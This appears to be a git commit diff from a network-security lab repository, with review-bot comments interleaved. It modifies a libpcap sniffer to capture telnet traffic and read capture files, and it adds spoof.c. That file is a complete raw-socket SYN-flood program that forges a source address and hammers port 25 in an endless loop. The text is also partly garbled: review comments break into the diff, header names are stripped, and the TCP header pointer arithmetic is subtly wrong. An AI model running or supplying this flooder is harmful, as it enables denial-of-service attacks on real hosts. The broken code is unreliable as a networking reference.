diff --git a/sniffex.c b/sniffex.c
index e968583..e88e886 100644
--- a/sniffex.c
+++ b/sniffex.c
@@ -507,7 +507,7 @@ int main(int argc, char **argv)
 char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
 pcap_t *handle; /* packet capture handle */
- char filter_exp[] = "dst portrange 10-100 and tcp"; /* filter expression [3] */
+ char filter_exp[] = "port 23"; /* filter expression [3] */
 struct bpf_program fp; /* compiled filter program (expression) */
 bpf_u_int32 mask; /* subnet mask */
 bpf_u_int32 net; /* ip */
@@ -515,11 +515,19 @@ int main(int argc, char **argv)
 print_app_banner();
+ // Check if file arg is passed.
+ int read_file = 0;
 /* check for capture device name on command-line */
 if (argc == 2) {
- dev = argv[1];
+ dev = argv[1];
 }
- else if (argc > 2) {
+ else if (argc == 3) {
+ if (!strcmp(argv[1], "file")) {
+ read_file = 1;
+ }
+ }
+ else if (argc > 3) {
 fprintf(stderr, "error: unrecognized command-line options\n\n");
 print_app_usage();
 exit(EXIT_FAILURE);
@@ -547,8 +555,14 @@ int main(int argc, char **argv)
 printf("Number of packets: %d\n", num_packets);
 printf("Filter expression: %s\n", filter_exp);
- /* open capture device */
- handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
+ if (read_file) {
+ printf("%s\n", argv[2]);
+ handle = pcap_open_offline(argv[2], errbuf);
+ }
+ else {
+ /* open capture device */
+ handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
+ }
 if (handle == NULL) {
 fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
 exit(EXIT_FAILURE);
@@ -574,8 +588,8 @@ int main(int argc, char **argv)
 exit(EXIT_FAILURE);
 }
- /* now we can set our callback function */
- pcap_loop(handle, num_packets, got_packet, NULL);
+ /* now we can set our callback function */
+ pcap_loop(handle, num_packets, got_packet, NULL);
 /* cleanup */
 pcap_freecode(&fp);
diff --git a/spoof.c b/spoof.c
new file mode 100644
index 0000000..a5f60bc
--- /dev/null
+++ b/spoof.c
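Review bot: In the new argument parsing, `argc == 3` with an `argv[1]` other than "file" is accepted silently: neither `dev` nor `read_file` is set, the usage error now fires only for `argc > 3`, and control presumably continues into the device lookup and open code with `dev` still at its initial value. Fold the mode check into the condition so every other three-argument form is rejected: `else if (argc == 3 && !strcmp(argv[1], "file")) { read_file = 1; }` followed by `else if (argc > 2) {` in front of the existing error branch. The file branch also never assigns `dev`, which matters because the open-failure message in the next hunk still formats `dev` with `%s`; `main` starts and ends outside this hunk.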
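Review bot: In file mode the unchanged failure message `fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf)` still prints `dev`, which the new parsing never assigns when `argv[1]` is "file", so an unreadable capture path is reported with a null `%s` argument (undefined behaviour) instead of the file name; pass `read_file ? argv[2] : dev` and reword the message to "Couldn't open %s: %s". The bare `printf("%s\n", argv[2]);` above `pcap_open_offline` reads like a leftover debug print; either drop it or label it like the neighbouring banner lines, e.g. `printf("Input file: %s\n", argv[2]);`. An offline capture file is untrusted input, so the per-packet parsing in `got_packet` (outside this hunk) should bound every header access by the captured length before this mode is relied on.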
@@ -0,0 +1,96 @@
+#define __USE_BSD /* use bsd'ish ip header */
+#include /* these headers are for a Linux system, but */
+#include /* the names on other systems are easy to guess.. */
+#include
+#define __FAVOR_BSD /* use bsd'ish tcp header */
+#include
+#include
+#include
+#include
+
+#define P 25 /* lets flood the sendmail port */
+
+unsigned short /* this function generates header checksums */
+csum (unsigned short *buf, int nwords)
+{
+ unsigned long sum;
+ for (sum = 0; nwords > 0; nwords--)
+ sum += *buf++;
+ sum = (sum >> 16) + (sum & 0xffff);
+ sum += (sum >> 16);
+ return ~sum;
+}
+
+int
+main (void)
+{
+ int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
+ char datagram[4096]; /* this buffer will contain ip header, tcp header,
+ and payload. we'll point an ip header structure
+ at its beginning, and a tcp header structure after
+ that to write the header values into it */
+ struct ip *iph = (struct ip *) datagram;
+ struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
+ struct sockaddr_in sin;
+ /* the sockaddr_in containing the dest. address is used
+ in sendto() to determine the datagrams path */
+
+ sin.sin_family = AF_INET;
+ sin.sin_port = htons (P);/* you byte-order >1byte header values to network
+ byte order (not needed on big endian machines) */
+ sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
+
+ memset (datagram, 0, 4096); /* zero out the buffer */
+
+/* we'll now fill in the ip/tcp header values, see above for explanations */
+ iph->ip_hl = 5;
+ iph->ip_v = 4;
+ iph->ip_tos = 0;
+ iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */
+ iph->ip_id = htonl (54321); /* the value doesn't matter here */
+ iph->ip_off = 0;
+ iph->ip_ttl = 255;
+ iph->ip_p = 6;
+ iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */
+ iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */
+ iph->ip_dst.s_addr = sin.sin_addr.s_addr;
+ tcph->th_sport = htons (1234); /* arbitrary port */
+ tcph->th_dport = htons (P);
+ tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */
+ tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */
+ tcph->th_x2 = 0;
+ tcph->th_off = 0; /* first and only tcp segment */
+ tcph->th_flags = TH_SYN; /* initial connection request */
+ tcph->th_win = htonl (65535); /* maximum allowed window size */
+ tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack
+ should fill in the correct checksum during transmission */
+ tcph->th_urp = 0;
+
+ iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
+
+/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
+ that the kernel knows the header is included in the data, and doesn't
+ insert its own header into the packet before our data */
+
+ { /* lets do it the ugly way.. */
+ int one = 1;
+ const int *val = &one;
+ if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
+ printf ("Warning: Cannot set HDRINCL!\n");
+ }
+
+ while (1)
+ {
+ if (sendto (s, /* our socket */
+ datagram, /* the buffer containing headers and data */
+ iph->ip_len, /* total length of our datagram */
+ 0, /* routing flags, normally always 0 */
+ (struct sockaddr *) &sin, /* socket addr, just like in */
+ sizeof (sin)) < 0) /* a normal send() */
+ printf ("error\n");
+ else
+ printf (".");
+ }
+
+ return 0;
+}
diff --git a/tfsession.pcap b/tfsession.pcap
new file mode 100644
index 0000000..5a48535
Binary files /dev/null and b/tfsession.pcap differ
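Review bot: The `socket()` result `s` at the top of `main` is never checked, so when the process lacks the privilege needed for a raw socket the `while (1)` loop calls `sendto` on an invalid descriptor indefinitely, printing "error" on every iteration; add `if (s < 0) { perror ("socket"); return 1; }` directly after the call. The send loop has no exit condition or packet budget, so `return 0` is unreachable and the descriptor is never closed; as committed the file is an open-ended SYN generator with a hard-coded spoofed source address and destination port, which needs a file-level comment stating its purpose in a sniffer repository — if it exists to produce test traffic for `sniffex`, give it a fixed iteration count and say so in that header comment. The `#include` lines carry no header names in this rendering, presumably stripped angle brackets, so confirm the committed file compiles as shown.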